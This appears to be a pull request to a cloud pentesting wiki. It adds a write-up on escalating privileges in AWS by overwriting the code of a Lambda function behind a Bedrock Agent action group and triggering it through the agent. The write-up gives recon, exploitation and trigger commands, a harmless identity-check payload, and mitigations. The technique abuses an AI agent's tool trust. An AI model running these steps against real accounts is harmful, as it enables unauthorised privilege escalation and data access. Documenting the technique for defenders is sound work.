### PR TITLE
AWS Bedrock: Add Lambda Tool Hijacking Privilege Escalation (Agent Action Groups)

### DIFF
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
@@ -29,7 +29,7 @@ List interpreters (control-plane) and inspect their configuration:
 ```bash
 aws bedrock-agentcore-control list-code-interpreters
 aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>
-````
+```
 
 > The create-code-interpreter command supports `--execution-role-arn` which defines what AWS permissions the interpreter will have.
 
@@ -108,6 +108,84 @@ awscurl -X POST \
 * Use **SCPs** to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary).
 * Enable appropriate **CloudTrail data events** for AgentCore where applicable; alert on unexpected invocations and session creation.
 
+## Amazon Bedrock Agents
+
+### `lambda:UpdateFunctionCode`, `bedrock:InvokeAgent` - Agent Tool Hijacking via Lambda
+
+Bedrock Agents can use **Lambda-backed action groups** as tools (external execution). If a principal can **modify the code of a Lambda function used by an agent**, and can then **invoke the agent**, they can execute attacker-controlled code under the **Lambda execution role**.
+
+> [!NOTE]
+> This is a **cross-service trust abuse** (Bedrock → Lambda), not a vulnerability. The attacker may not be able to invoke the Lambda directly, but can still trigger it via the agent.
+
+#### Preconditions (common misconfiguration)
+
+- A Bedrock Agent exists with an **action group backed by a Lambda function**
+- The attacker has:
+  - `lambda:UpdateFunctionCode`
+  - `bedrock:InvokeAgent`
+- The Lambda execution role has broader permissions than the attacker
+- The attacker can identify the Lambda used by the agent
+
+#### Recon
+
+Enumerate agent action groups:
+
+```bash
+aws bedrock-agent list-agents
+aws bedrock-agent get-agent --agent-id <AGENT_ID>
+aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID>
+```
+
+Inspect Lambda:
+
+```bash
+aws lambda get-function --function-name <FUNCTION_NAME>
+```
+
+#### Exploitation
+
+Replace Lambda code:
+
+```bash
+zip payload.zip lambda_function.py
+
+aws lambda update-function-code \
+  --function-name <FUNCTION_NAME> \
+  --zip-file fileb://payload.zip
+```
+
+Example payload:
+
+```python
+import boto3
+
+def lambda_handler(event, context):
+    return boto3.client("sts").get_caller_identity()
+```
+
+Trigger via agent:
+
+```bash
+aws bedrock-agent-runtime invoke-agent \
+  --agent-id <AGENT_ID> \
+  --agent-alias-id <ALIAS_ID> \
+  --session-id test \
+  --input-text "trigger tool"
+```
+
+#### Impact
+
+* **Privilege escalation** into Lambda execution role
+* **Data exfiltration** from AWS services
+* **Cross-service abuse** via trusted agent execution
+
+#### Mitigations
+
+* **Restrict** `lambda:UpdateFunctionCode`
+* Use **least-privilege** Lambda roles
+* **Monitor** Lambda code changes
+* **Audit** Bedrock agent tool usage
+
 ## References
 
 - [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/)
@@ -116,6 +194,7 @@ awscurl -X POST \
 - [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
 - [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html)
 - [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
+- [SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors)
 
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
@@ -133,7 +133,7 @@ Enumerate agent action groups:
 ```bash
 aws bedrock-agent list-agents
 aws bedrock-agent get-agent --agent-id <AGENT_ID>
-aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID>
+aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT
 ```
 
 Inspect Lambda:


### PR DESCRIPTION
## Summary

Adds a new AWS Bedrock privilege escalation technique based on Lambda-backed agent tool hijacking.

## Details

This PR introduces a misconfiguration scenario where a principal with:

- `lambda:UpdateFunctionCode`
- `bedrock:InvokeAgent`

can modify a Lambda function used by a Bedrock Agent action group and trigger its execution via the agent.

## Relation to Existing Content

This complements the existing Bedrock privilege escalation technique:

- **Code Interpreter Execution-Role Pivot** (`bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter`)

While the existing technique focuses on **AgentCore Code Interpreter execution roles**, this PR introduces a separate attack surface:

- **Bedrock Agents + Lambda action groups**
- cross-service trust abuse (Bedrock → Lambda)

No existing content currently documents this vector.

## Additional Changes

- Fixed minor markdown formatting issue in the existing mrkdown (```` instead of ```).

## References / Creds

- https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors